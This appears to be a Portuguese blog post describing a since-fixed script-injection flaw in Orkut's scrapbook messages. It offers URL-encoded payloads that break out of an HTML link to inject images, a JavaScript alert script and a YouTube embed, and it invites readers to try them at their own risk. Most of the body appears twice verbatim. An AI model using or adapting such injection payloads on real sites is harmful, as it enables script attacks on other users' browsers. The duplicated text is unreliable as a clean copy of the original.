Os usuários Victor Pencak e Steven Conte reportaram uma falha de segurança grave no sistema de recados do Orkut. Graças ao bug, as pessoas podem inserir scripts, imagens e vídeos nos recados. Embora o conteudo pareça inofensivo, os scripts e imagens podem explorar falhas no navegador e no sistema, causando danos que variam de simples instabilidades à Vírus e Malwares em geral. Por isso recomendamos muito cuidado com o uso do serviço enquanto o bug não é corrigido.
Para enviar uma imagem a um amigo, basta copiar a url abaixo, substituindo endereco_da_imagem pelo local onde a foto se encontra armazenada.
http://www.orkut.com/%22%3e%3c/a%3e%3Cimg%20src%
3D%22endereco_da_imagem
%22%3E%3Ca%20style%3D%22display%3
Anone%22%20href%3D%22%3C/a%3E
*Url dividida em linhas para facilitar a vizualização
O mesmo código pode ser usado para implantar pequenos scripts. O exemplo à seguir dispara uma caixa de mensagens com o uso da função alert(); Novamente, basta copiar e colar.
http://www.orkut.com/%22%3e%3c/a%3e%3cscript%3ealert
%28%22Oi!!%22%29%3c/script%3e%3ca%20style=%22
display%3anone%22%20href=%22/
*Url dividida em linhas para facilitar a vizualização
Para postar videos do YouTube:
http://www.orkut.com/%22%3e%3c/a%3e%3Cembed%
20src%3D%22http%3A//
www.youtube.com/v/ID%22%3E%3Ca%
20style%3D%22display%3
Anone%22%20href%3D%22
*Url dividida em linhas para facilitar a vizualização
Substitua o ID logo após o endereço youtube.com/v/ pelo id do endereço do vídeo no YouTube, por exemplo se o endereço do vídeo que você quer que apareça é esse: www.youtube.com/watch?v=AkmYXiaQNxs, substitua o ID por AkmYXiaQNxs .
Não nos responsabilizamos pelas conseqüências, experimente por sua conta e risco.
Copiado descaradamente do UnderGoogle.
Update: falha corrigida em menos de um dia.
Para enviar uma imagem a um amigo, basta copiar a url abaixo, substituindo endereco_da_imagem pelo local onde a foto se encontra armazenada.
http://www.orkut.com/%22%3e%3c/a%3e%3Cimg%20src%
3D%22endereco_da_imagem
%22%3E%3Ca%20style%3D%22display%3
Anone%22%20href%3D%22%3C/a%3E
*Url dividida em linhas para facilitar a vizualização
O mesmo código pode ser usado para implantar pequenos scripts. O exemplo à seguir dispara uma caixa de mensagens com o uso da função alert(); Novamente, basta copiar e colar.
http://www.orkut.com/%22%3e%3c/a%3e%3cscript%3ealert
%28%22Oi!!%22%29%3c/script%3e%3ca%20style=%22
display%3anone%22%20href=%22/
*Url dividida em linhas para facilitar a vizualização
Para postar videos do YouTube:
http://www.orkut.com/%22%3e%3c/a%3e%3Cembed%
20src%3D%22http%3A//
www.youtube.com/v/ID%22%3E%3Ca%
20style%3D%22display%3
Anone%22%20href%3D%22
*Url dividida em linhas para facilitar a vizualização
Substitua o ID logo após o endereço youtube.com/v/ pelo id do endereço do vídeo no YouTube, por exemplo se o endereço do vídeo que você quer que apareça é esse: www.youtube.com/watch?v=AkmYXiaQNxs, substitua o ID por AkmYXiaQNxs .
Não nos responsabilizamos pelas conseqüências, experimente por sua conta e risco.
Copiado descaradamente do UnderGoogle.
Update: falha corrigida em menos de um dia.
